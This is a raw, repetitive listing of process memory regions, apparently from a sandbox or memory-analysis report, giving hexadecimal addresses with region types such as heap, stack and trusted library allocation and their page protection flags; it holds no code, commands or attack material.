7FFD34700000
trusted library allocation
page read and write
1E6E91C2000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD3460A000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125C1A4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFB7000
heap
page read and write
7FFD34660000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91A8000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34510000
trusted library allocation
page execute and read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
D1E027E000
stack
page read and write
7FFD346C0000
trusted library allocation
page read and write
2172F0F4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145B9F0000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
2172F0F0000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91A8000
heap
page read and write
1E6E91D4000
heap
page read and write
2145F123000
trusted library allocation
page read and write
7FFD3446B000
trusted library allocation
page read and write
2125D950000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFB6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91A8000
heap
page read and write
1E6E91C7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
21475E8A000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
D1DFF7F000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125C1A0000
heap
page read and write
2145BA50000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFCD000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91A8000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34632000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E93F4000
heap
page read and write
2145B918000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFBF000
heap
page read and write
7FFD346E0000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D5000
heap
page read and write
2145D8CA000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF7D000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2172EE10000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
DB986FF000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34730000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF59000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E90F0000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
2145D4FB000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFCF000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125E378000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
2125BFCD000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
21475F08000
heap
page read and write
2125BF9D000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
2145B8D0000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E92D0000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF7B000
heap
page read and write
2125BFD2000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
D1DFEFE000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
2125DA10000
direct allocation
page read and write
7FFD346B0000
trusted library allocation
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
214758B0000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD3445D000
trusted library allocation
page execute and read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD3450C000
trusted library allocation
page execute and read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34452000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
D1E02FE000
stack
page read and write
1E6E91D4000
heap
page read and write
2145F0F8000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2172EF10000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
21475E93000
heap
page read and write
2145BA20000
trusted library section
page read and write
1E6E91C3000
heap
page read and write
7FFD345F0000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C2000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E9110000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91C9000
heap
page read and write
2125BF80000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
2145B926000
heap
page read and write
2125BF00000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34720000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF6E000
heap
page read and write
1E6E91D4000
heap
page read and write
D1E0E4E000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
2125E324000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF95000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34620000
trusted library allocation
page execute and read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C9000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34650000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
D1DF9FF000
stack
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
2145D4B0000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
2125BF8D000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C8000
heap
page read and write
2125BF8D000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145F4C3000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
2125D997000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34454000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34710000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
2125E330000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
2172EE1A000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
2145B95F000
heap
page read and write
2145BA70000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
2125D9AB000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
2145B938000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145D480000
heap
page execute and read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145B964000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34780000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C8000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
7FFD34790000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34634000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34500000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF8D000
heap
page read and write
2145DA74000
trusted library allocation
page read and write
1E6E91D5000
heap
page read and write
7FFD347A0000
trusted library allocation
page read and write
1E6E91D7000
heap
page read and write
2125BFB4000
heap
page read and write
2145B961000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
D1E0E03000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34690000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91A8000
heap
page read and write
1E6E91D4000
heap
page read and write
D1DFCFE000
stack
page read and write
7FFD34470000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91A8000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
2145D4C0000
heap
page execute and read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E9010000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
21475C10000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91C3000
heap
page read and write
2125D9B0000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFC4000
heap
page read and write
2145BB54000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125DA30000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34601000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
16B37FE000
unkown
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145EEEC000
trusted library allocation
page read and write
D1E03FE000
stack
page read and write
1E6E91D4000
heap
page read and write
2125D979000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34506000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
214759C5000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
7FFD346D0000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E93F0000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
D1DFDFE000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFCD000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125D9F0000
direct allocation
page read and write
2146D9F5000
trusted library allocation
page read and write
2145B890000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C2000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91A8000
heap
page read and write
7FFD346A0000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
7FFD34760000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF10000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
D1E01FC000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFCB000
heap
page read and write
1E6E91D4000
heap
page read and write
2125D993000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2146D8B2000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91A8000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145F17E000
trusted library allocation
page read and write
2145D4F4000
heap
page read and write
2145F4D2000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
214758D2000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
21475BD4000
unkown
page readonly
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFCF000
heap
page read and write
1E6E91D4000
heap
page read and write
2145BA10000
trusted library section
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
2125E370000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF30000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125E326000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
2145D4B3000
trusted library allocation
page read and write
D1E0178000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1C991FF000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
2145D841000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2172ED00000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1C993FF000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125D990000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF50000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34460000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2146D841000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
DB984FC000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
214758D0000
heap
page read and write
2145EE74000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C8000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125E350000
direct allocation
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
2125E326000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
214759B0000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E919B000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFD4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E9190000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFB3000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
